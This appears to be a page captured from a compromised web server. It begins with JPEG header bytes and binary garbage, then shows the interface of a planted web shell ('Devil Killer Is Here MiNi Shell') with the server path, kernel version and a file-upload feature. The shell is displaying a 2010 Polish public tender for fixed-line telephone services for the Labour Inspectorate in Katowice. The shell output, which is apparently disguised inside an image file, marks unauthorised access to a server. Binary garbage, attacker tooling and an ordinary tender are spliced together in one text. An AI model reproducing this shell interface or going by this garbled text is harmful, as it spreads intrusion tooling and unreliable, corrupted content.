JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100609/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100609/147887-N-2010.html

<p class="kh_header"><b>Katowice: Usługi telefonii stacjonarnej dla Państwowej Inspekcji Pracy Okręgowy Inspektorat Pracy w Katowicach</b><br>
<b>Numer ogłoszenia: 147887 - 2010; data zamieszczenia: 09.06.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Państwowa Inspekcja Pracy Okręgowy Inspektorat Pracy w Katowicach , ul. Graniczna 29, 40-017 Katowice, woj. śląskie, tel. 032 6041208, faks 032 6041250.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.katowice.oip.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: nadzór nad warunkami pracy.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługi telefonii stacjonarnej dla Państwowej Inspekcji Pracy Okręgowy Inspektorat Pracy w Katowicach.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest świadczenie usług telefonii stacjonarnej dla Okręgowego Inspektoratu Pracy w Katowicach - we wszystkich jego lokalizacjach, tj.:
- 	Okręgowy Inspektorat Pracy w Katowicach, ul. Graniczna 29, 40-017 Katowice,
-	Oddział w Bielsku-Białej, ul. Warszawska 5, 43-300 Bielsko-Biała,
-	Oddział w Częstochowie, ul. Warszawska 30, 42-200 Częstochowa,
-	Oddział w Gliwicach, ul. Mitręgi 2, 44-100 Gliwice,
-	Oddział w Rybniku, ul. Białych 7, 44-200 Rybnik,
-           Oddział w Zawierciu, ul. Okólna 10, 42-400 Zawiercie.
1. 	Szczegółowy opis przedmiotu zamówienia:
1.1. 	dla lokalizacji: 40-017 Katowice, ul. Graniczna 29:
	stacjonarne usługi telefoniczne ISDN 30B+D dostarczone drogą kablową. Świadczenie to zostanie zrealizowane poprzez podłączenie do analogowej centrali telefonicznej zamawiającego Telesis PX 24/40 w budynku zlokalizowanym w Katowicach, przy ul. Granicznej 29 w pomieszczeniu znajdującym się na I piętrze, z uruchomieniem traktu cyfrowego o następujących parametrach:
- 	trakt cyfrowy ISDN z 30 kanałami B+D o przepustowości 64 kbit/s każdy,
- 	sekundowe rozliczenia połączeń,
- 	bezpośredni numer wewnętrzny (DDI) - wymagane jest minimum 550 DDI,
- 	koszt połączenia (AOC),
- 	połączenie oczekujące (CW),
- 	zawieszenie połączenia (HOLD),
- 	prezentacja numeru (CLIP),
- 	blokada prezentacji numeru (CLIR),
- 	możliwość bezpłatnej blokady połączeń międzynarodowych lub z numerami zaczynającymi się od 70X.
	Przewidywana ilość minut połączeń zgodnie z formularzem cenowym (załącznik nr 7 do specyfikacji istotnych warunków zamówienia - siwz), tj. 4200 minut połączeń lokalnych i strefowych, 2000 minut połączeń międzystrefowych, 230 minut połączeń do sieci komórkowych (oprócz PLAY i POLSAT), 15 minut połączeń do sieci komórkowych PLAY i POLSAT,
1.2. 	dla lokalizacji: 43-300 Bielsko-Biała, ul. Warszawska 5:
	Stacjonarne usługi telefoniczne 3 linie ISDN 2B+D dostarczone drogą kablową (linia cyfrowa) 33 XXX XX XX,  
- 	sekundowe rozliczenia połączeń,
- 	bezpośredni numer wewnętrzny (DDI) - należy zapewnić możliwość podłączenia (na polecenie Zamawiającego) co najmniej 40 numerów DDI w ramach linii ISDN (łącznie),
- 	blokada prezentacji numeru (CLIR),
- 	możliwość bezpłatnej blokady połączeń międzynarodowych lub z numerami zaczynającymi się od 70X.
	Przewidywana ilość minut połączeń - patrz formularz cenowy (załącznik nr 7 do siwz), tj. 450 minut połączeń lokalnych i strefowych, 1200 minut połączeń międzystrefowych, 570 minut połączeń do sieci komórkowych (oprócz PLAY i POLSAT), 10 minut połączeń do sieci komórkowych PLAY i POLSAT,
1.3.	 dla lokalizacji: 42-200 Częstochowa, ul. Warszawska 30 - do 30.11.2010 r., a od 01.12.2010 r. dla lokalizacji 42-215 Częstochowa, ul. Kisielewskiego 18/28B:
	stacjonarne usługi telefoniczne 3 linie ISDN 2B+D dostarczone drogą kablową (linia cyfrowa) 34 XXX XX XX, 
- 	sekundowe rozliczenia połączeń,
- 	bezpośredni numer wewnętrzny (DDI) - należy zapewnić możliwość podłączenia (na polecenie Zamawiającego) co najmniej 40 numerów DDI w ramach linii ISDN (łącznie),
- 	blokada prezentacji numeru (CLIR),
- 	możliwość bezpłatnej blokady połączeń międzynarodowych lub z numerami zaczynającymi się od 70X.
	Przewidywana ilość minut połączeń - patrz formularz cenowy (załącznik nr 7 do siwz), tj. 360 minut połączeń lokalnych i strefowych, 560 minut połączeń międzystrefowych, 400 minut połączeń do sieci komórkowych (oprócz PLAY i POLSAT), 10 minut połączeń do sieci komórkowych PLAY i POLSAT,
1.4.	dla lokalizacji: 44-100 Gliwice, ul. Mitręgi 2:
	Stacjonarne usługi telefoniczne 3 linie ISDN 2B+D dostarczone drogą kablową (linia cyfrowa) 32 XXX XX XX, 
- 	sekundowe rozliczenia połączeń,
- 	bezpośredni numer wewnętrzny (DDI) - należy zapewnić możliwość podłączenia (na polecenie Zamawiającego) co najmniej 40 numerów DDI w ramach linii ISDN (łącznie),
- 	blokada prezentacji numeru (CLIR),
- 	możliwość bezpłatnej blokady połączeń międzynarodowych lub z numerami zaczynającymi się od 70X.
	Przewidywana ilość minut połączeń - patrz formularz cenowy (załącznik nr 7 do siwz),tj. 1000 minut połączeń lokalnych i strefowych, 120 minut połączeń międzystrefowych, 550 minut połączeń do sieci komórkowych (oprócz PLAY i POLSAT), 10 minut połączeń do sieci komórkowych PLAY i POLSAT,
1.5. 	dla lokalizacji: 44-200 Rybnik, ul. Białych 7:
	Stacjonarne usługi telefoniczne 2 linie ISDN 2B+D dostarczone drogą kablową (linia cyfrowa) 32 XXX XX XX, 
- 	sekundowe rozliczenia połączeń,
- 	bezpośredni numer wewnętrzny (DDI) - należy zapewnić możliwość podłączenia (na polecenie Zamawiającego) co najmniej 20 numerów DDI w ramach linii ISDN (łącznie),
- 	blokada prezentacji numeru (CLIR),
- 	możliwość bezpłatnej blokady połączeń międzynarodowych lub z numerami zaczynającymi się od 70X.
	Przewidywana ilość minut połączeń - patrz formularz cenowy (załącznik nr 7 do siwz), tj. 700 minut połączeń lokalnych i strefowych, 30 minut połączeń międzystrefowych, 430 minut połączeń do sieci komórkowych (oprócz PLAY i POLSAT), 5 minut połączeń do sieci komórkowych PLAY i POLSAT,
1.6. 	dla lokalizacji: 42-400 Zawiercie, ul. Okólna 10:
	Stacjonarne usługi telefoniczne 2 linie ISDN 2B+D dostarczone drogą kablową (linia cyfrowa) 32 XXX XX XX, 
- 	sekundowe rozliczenia połączeń,
- 	bezpośredni numer wewnętrzny (DDI) - należy zapewnić możliwość podłączenia (na polecenie Zamawiającego) co najmniej 20 numerów DDI w ramach linii ISDN (łącznie),
- 	blokada prezentacji numeru (CLIR),
- 	możliwość bezpłatnej blokady połączeń międzynarodowych lub z numerami zaczynającymi się od 70X.
	Przewidywana ilość minut połączeń - patrz formularz cenowy (załącznik nr 7 do siwz), tj. 300 minut połączeń lokalnych i strefowych, 70 minut połączeń międzystrefowych, 280 minut połączeń do sieci komórkowych (oprócz PLAY i POLSAT), 5 minut połączeń do sieci komórkowych PLAY i POLSAT.
2.		Usługa telekomunikacyjna musi mieć charakter powszechny i być świadczona w zgodzie z obowiązującymi przepisami. Usługa obejmuje obsługę połączeń wychodzących lokalnych, strefowych, międzystrefowych, do sieci komórkowych i innych sieci publicznych, takich jak połączenia z biurami numerów, linie informacyjne, świadczenie usług faksowych itp.
3.		Połączenia muszą być realizowane jako połączenia komutowane, z wyłączeniem technologii internetowych VoIP, bezprzewodowych (np. radiowych), bramek GSM itp.
4.		Regulamin usług telekomunikacyjnych Wykonawcy nie może być sprzeczny z postanowieniami umowy i niniejszej siwz. Przedmiotowy regulamin nie będzie obowiązywał w zakresie, w którym jest sprzeczny z powyższymi zapisami. Zmiany regulaminu w trakcie wykonywania umowy, niekorzystne dla Zamawiającego lub niezgodne z postanowieniami siwz, nie będą obowiązywały.
5.	Wszelkie ewentualne koszty związane z przejściem do innego operatora, preselekcja, aktywacja numerów i dostępów zewnętrznych będących w posiadaniu zamawiającego, opłaty startowe, opłaty za użytkowanie okablowania (jeśli dotyczy), koszt ewentualnej rozbudowy infrastruktury (o ile zajdzie taka potrzeba) itp. należy wliczyć w wartość miesięcznego abonamentu. Zamawiający nie przewiduje uiszczania jakichkolwiek innych opłat (w tym za połączenia przychodzące do numerów zamawiającego), oprócz opłat za abonament oraz za wykonane połączenia wychodzące.
6.	Zamawiający zachowuje dotychczasowe numery telefoniczne. Wykonawca zapewni przeniesienie do własnej sieci dotychczasowych numerów przydzielonych i wykorzystywanych przez zamawiającego. Koszty z tytułu ewentualnego przeniesienia numerów ponosi wykonawca.
7.	Zrealizowane przez zamawiającego połączenia telefoniczne będą rozliczane na podstawie tzw. płaskiego planu taryfowego, tj. ceny minuty danego rodzaju połączenia będą jednakowe bez względu na porę dnia oraz dni tygodnia. 
	Opłata naliczana będzie za każdą sekundę, bez opłaty inicjacyjnej za rozpoczęcie połączenia.
	W trakcie realizacji umowy, ceny - za zgodą obu stron umowy - mogą ulec obniżeniu.
8.	Zamawiający ma możliwość uzyskania dostępu do innych usług dodatkowych określonych w zaproponowanej taryfie telekomunikacyjnej wykonawcy (np. pakietów minut, pakietów kwotowych).
9.	Wykonawca - na wniosek zamawiającego - zapewni możliwość zmiany taryf w trakcie obowiązywania umowy, w przypadku gdy na rynku pojawi się ogólnodostępna oferta wykonawcy i będą ona korzystniejsza od dotychczasowej. O pojawieniu się nowych ofert/planów taryfowych Wykonawca powiadomi Zamawiającego. 
10.	Zamawiający zakłada, że w razie potrzeby będzie korzystał z połączeń międzynarodowych oraz z usług dodatkowych. Usługi te będą rozliczane na podstawie aktualnego cennika wykonawcy. O każdej zmianie cennika wykonawca będzie pisemnie informował zamawiającego z co najmniej pięciodniowym wyprzedzeniem. Zamawiający nie dopuszcza, by ceny wskazane w ofercie uległy w trakcie realizacji umowy zwiększeniu na niekorzyść zamawiającego. Przedmiotowy cennik należy załączyć do oferty. 
11.	Połączenia wewnętrzne będą realizowane bezpłatnie, w ramach danej siedziby zama-wiającego, w oparciu o niżej wymienione centrale telefoniczne, będące własnością zamawiającego:
- 	centrala Telesis PX 24/40 - w siedzibie zamawiającego w Katowicach,
- 	centrala Panasonic KX-TDA30CE - w Oddziale w Bielsku-Białej,
- 	centrala Digitex DCT40 - w Oddziale w Częstochowie,
- 	centrala Panasonic KX-TDA30 - w Oddziale w Gliwicach,
- 	centrala KX-TEM824 - w Oddziale w Rybniku,
- 	centrala Panasonic KX-TD 616 - w Oddziale w Zawierciu.
Zamawiający powiadomi Wykonawcę w przypadku zakupu nowego typu centrali w danej siedzibie.
12.	Wykonawca zapewni bezpłatny, ciągły, dwudziestoczterogodzinny dostęp do serwisu i gwarantowany czas usunięcia awarii do 12 godzin od chwili jej zgłoszenia bez względu na godzinę zgłoszenia i dzień tygodnia (serwis przez cały okres świadczenia usługi). Koszt dojazdu serwisanta, jego usługi i wszelkie inne koszty należy wliczyć w cenę miesięcznego abonamentu. Zamawiający nie przewiduje możliwości uiszczania dodatkowej zapłaty za świadczenie usług serwisowych.
13.	Wykonawca zapewni opiekuna technicznego i handlowego na czas trwania umowy w celu zapewnienia bieżącej obsługi - dane ww. osób należy podać w ofercie.
14.	Termin wykonania zamówienia - 24 miesiące od dnia zawarcia umowy (lub do wcześniejszego wyczerpania kwoty umowy). Rozpoczęcie świadczenia usługi - zgodnie z dyspozycją Zamawiającego, nie później niż 50 dni od podpisania umowy.
15.	Miejsce wykonania zamówienia to siedziby zamawiającego, tj.:
- 	Okręgowy Inspektorat Pracy w Katowicach, ul. Graniczna 29, 40-017 Katowice,
-	Oddział w Bielsku-Białej, ul. Warszawska 5, 43-300 Bielsko-Biała,
-	Oddział w Częstochowie, ul. Warszawska 30, 42-200 Częstochowa,
-	Oddział w Gliwicach, ul. Mitręgi 2, 44-100 Gliwice,
-	Oddział w Rybniku, ul. Białych 7, 44-200 Rybnik,
-    Oddział w Zawierciu, ul. Okólna 10, 42-400 Zawiercie.
Zamawiający informuje, że w trakcie trwania umowy zawartej w wyniku niniejszego postępowania (od 01.12.2010 r.), nastąpi zmiana lokalizacji świadczenia usług tele-fonii stacjonarnej dla Oddziału w Częstochowie z adresu: 42-200 Częstochowa, ul. Warszawska 30, na adres: 42-215 Częstochowa, ul. Kisielewskiego 18/28B. Zmiana tego adresu nie będzie przyczyną do wypowiedzenia umowy na świadczenie usług telefonii stacjonarnej. Wszystkie  koszty zmiany lokalizacji świadczenia usług mają być zawarte w abonamentach.
16.	Zasady uiszczania zapłaty za wykonane usługi:
	Zapłata wynagrodzenia za wykonane usługi następować będzie na podstawie comiesięcznych faktur wystawianych po zakończeniu miesięcznego okresu rozliczeniowego. Faktury mają być dostarczane do siedziby zamawiającego. Faktura płatna będzie przelewem na konto wykonawcy podane na fakturze, w terminie 14 dni od dnia jej otrzymania. 
	Do każdej faktury wykonawca dołączy bezpłatnie pełne zestawienie bilingowe. Dopuszczalne jest udostępnianie tych informacji za pomocą strony internetowej wykonawcy, dostarczanie pocztą elektroniczną lub na nośniku magnetycznym (CD, DVD), w terminie 14 dni od zakończenia okresu rozliczeniowego. Zestawienia bilingowe muszą zawierać informację o łącznym czasie połączeń zainicjowanych w okresie rozliczeniowym, którego dotyczy zestawienie oraz zestawienie rozmów z podaniem numeru abonenta wybierają-cego i wybieranego, datę i godzinę rozpoczęcia oraz zakończenia połączenia, czas roz-mowy podany z dokładnością do jednej sekundy, koszt połączenia. W przypadku dostarczania bilingów na płycie CD/DVD wykonawca zobowiązany będzie wraz z pierwszym bilingiem dostarczyć bezpłatnie (koszt wliczony w cenę oferty) zamawiającemu oprogramowanie umożliwiające odczyt i obróbkę danych zawartych w bilingu. Oprogramowanie ma umożliwiać dokonywanie wydruków dla poszczególnych numerów oraz dla całej instytucji.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 64.21.00.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 24.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. 	Oferta musi być zabezpieczona wadium w wysokości: 2000,00 PLN. 
2.	Zamawiający wymaga wniesienia wadium przed terminem składania ofert. 
3. 	Wadium może być wniesione w jednej lub kilku następujących formach: 
1) 	pieniądzu, 
2)          poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym, 
3) 	gwarancjach bankowych, 
4) 	gwarancjach ubezpieczeniowych, 
5) 	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007 r. Nr 42, poz. 275).
4. 	Wadium w formie pieniężnej należy wnieść przelewem na rachunek bankowy zamawiającego: NBP O/O KATOWICE, konto nr 16 1010 1212 0013 1322 3000 0000.
	Kserokopie dowodu przelewu należy dołączyć do oferty (zgodnie z pkt 3.7 siwz). Nie dopuszcza się wnoszenia wadium w formie pieniężnej do kasy zamawiającego. Wniesione wadium w pieniądzu uznaje się za wniesione w terminie, gdy w chwili upływu terminu składania ofert wadium zostanie zarachowane na rachunku bankowym zamawiającego.
5. 	Wadium wnoszone w formie: poręczenia bankowego, gwarancji bankowej, gwarancji ubez-pieczeniowej lub poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 4 lit. b ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości, należy załączyć w formie oryginału do oferty (jak w pkt 3.7 siwz). 
6. 	W przypadku wniesienia wadium w innych formach przewidzianych w art. 45 ust. 6 Pzp dokumenty takie muszą zawierać następujące informacje:
a) 	określenie przedmiotu przetargu - należy zacytować dokładnie nazwę przetargu,
b) 	określenie numeru postępowania u zamawiającego, tj. Kt/02D-2212-6/09/10,
c) 	określenie podmiotu, który wystawia gwarancję (pełna nazwa, dokładny adres),
d) 	określenie beneficjanta gwarancji - nazwa, adres,
e) 	określenie podmiotu, na rzecz którego wystawiana jest gwarancja - dane wykonawcy (pełna nazwa, dokładny adres); jeżeli ofertę składa konsorcjum lub inny podmiot wspólny w gwarancji muszą być wymienione wszystkie podmioty wchodzące w jego skład,
f) 	określenie kwoty gwarancji - musi ona odpowiadać kwocie wadium; kwota wadium musi być wyrażona w złotych polskich,
g) 	gwarancja musi zapewnić wypłatę pełnej kwoty wadium przetargowego - w razie zaistnienia okoliczności określonych w art. 46 Pzp - pod groźbą wykluczenia wykonawcy z postępowania na podstawie art. 24 ust. 2 pkt 2 Pzp,
h) 	określenie terminu ważności gwarancji - okres ten nie może być krótszy niż 30 dni.
7. 	Gwarancja musi być podpisana przez upoważnionego (upełnomocnionego) przedstawiciela gwaranta. Podpis winien być sporządzony w sposób umożliwiający jego identyfikację, np. złożony wraz z imienną pieczątką lub czytelny (z podaniem imienia i nazwiska). 
	Z treści gwarancji winno wynikać bezwarunkowe, na każde pisemne żądanie zgłoszone przez zamawiającego w terminie związania ofertą, zobowiązanie gwaranta do wypłaty zamawiającemu pełnej kwoty wadium w okolicznościach określonych w art. 46 ust. 4a i ust. 5 Pzp. 
8. 	Wykonawca, który nie wniesie wadium lub nie zabezpieczy oferty akceptowalną formą wadium zostanie wykluczony z postępowania, a jego oferta zostanie uznana za odrzuconą. 
9. 	Zamawiający zwraca wadium wszystkim wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem wykonawcy, którego oferta została wybrana jako najkorzystniejsza, z zastrzeżeniem ust. 4a Pzp.
10. Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, zamawiający zwraca wadium niezwłocznie po zawarciu umowy oraz wniesieniu zabezpieczenia należytego wykonania umowy, o którym mowa w pkt 13 siwz.
	Zamawiający niezwłocznie zwraca wadium, na wniosek wykonawcy, 	który wycofał ofertę  przed upływem terminu składania ofert.
11. 	Wadium wykonawcy, którego oferta została wybrana, zostanie zatrzymane wraz z odsetkami w przypadku, gdy wykonawca: 
- 	odmówi podpisania umowy na warunkach określonych w ofercie, 
- 	nie wniesie zabezpieczenia należytego wykonania umowy, 
- 	zawarcie umowy stanie się niemożliwe z przyczyn leżących po stronie wykonawcy.
12. Zamawiający zażąda ponownego wniesienia wadium przez wykonawcę, któremu zwrócono wadium na podstawie  art. 46 ust 1 Pzp, jeżeli w wyniku rozstrzygnięcia odwołania jego oferta zostanie wybrana jako najkorzystniejsza. Wykonawca wnosi wadium w terminie określonym przez zamawiającego.
13. Dowód wniesienia wadium ma być załączonY do oferty w formie oryginałU (w przypadku wniesienia wadium w formach określonych w art. 45 ust. 6 pkt 2-5 Pzp; w przypadku wniesienia wadium w pieniądzu na konto zamawiającego, dopuszczalne jest załączenie kserokopii dowodu przelewu poświadczonej za zgodność z oryginałem)</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca nie może podlegać wykluczeniu z ubiegania się o udzielenie zamówienia, określonego w pkt 2 specyfikacji istotnych warunków zamówienia - na podstawie art. 24 ust. 1 i ust. 2 ustawy Prawo zamówień publicznych (Pzp)  oraz rozporządzenia Prezesa Rady Ministrów z dnia 30 grudnia 2009  roku w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane (Dz. U. z 2009 roku Nr 226, poz. 1817 ze zm.) oraz musi spełniać wymogi określone w art. 22 ust. 1 Pzp. 
Wykazanie braku podstaw do wykluczenia wykonawcy z postępowania oraz potwierdzenie spełniania warunków udziału w postępowaniu należy dokonać poprzez załączenie do oferty dokumentów wymienionych w pkt III.4 (w postaci oryginałów lub kserokopii potwierdzonych przez wykonawcę za zgodność z oryginałem).
W odniesieniu do oświadczenia o braku podstaw do wykluczenia wykonawcy z postępowania - zgodnie z art. 24 ust. 1 Pzp oraz o spełnieniu warunków udziału w postępowaniu określonych w oparciu o art. 22 ust. 1 Pzp (o którym mowa w pkt III.4.2 myślnik pierwszy) - ma być ono w formie zgodnej z załącznikiem numer 5 do siwz (zgodnej z Pzp), w formie oryginału.
W odniesieniu do dokumentu wymienionego w pkt III.4.1 myślnik pierwszy - należy załączyć zaświadczenie o wpisie do rejestru przedsiębiorców telekomunikacyjnych, wydane na podstawie art. 11 ust. 1 ustawy z dn. 16.07.2004 r. - Prawo telekomunikacyjne (Dz. U. z 2004 r. Nr 171, poz. 1800 ze zm.). Dokument ten może być dołaczony w formie kopii poświadczonej za zgodność z oryginałem.
Zamawiający dopuszcza, by wszystkie dokumenty były załączone do oferty w formie oryginałów. 
W przypadku podmiotu wspólnego, o którym mowa w art. 23 Pzp:
a)  warunki wskazane w pkt III.3.2, III.3.5 oraz ww. zaświadczenie o wpisie do rejestru mogą spełniać łącznie wszystkie podmioty wchodzące w skład podmiotu wspólnego,
b) dokumenty, o których mowa w pkt III.4.2 ma złożyć każdy podmiot wchodzący w skład podmiotu wspólnego.
Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych i innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
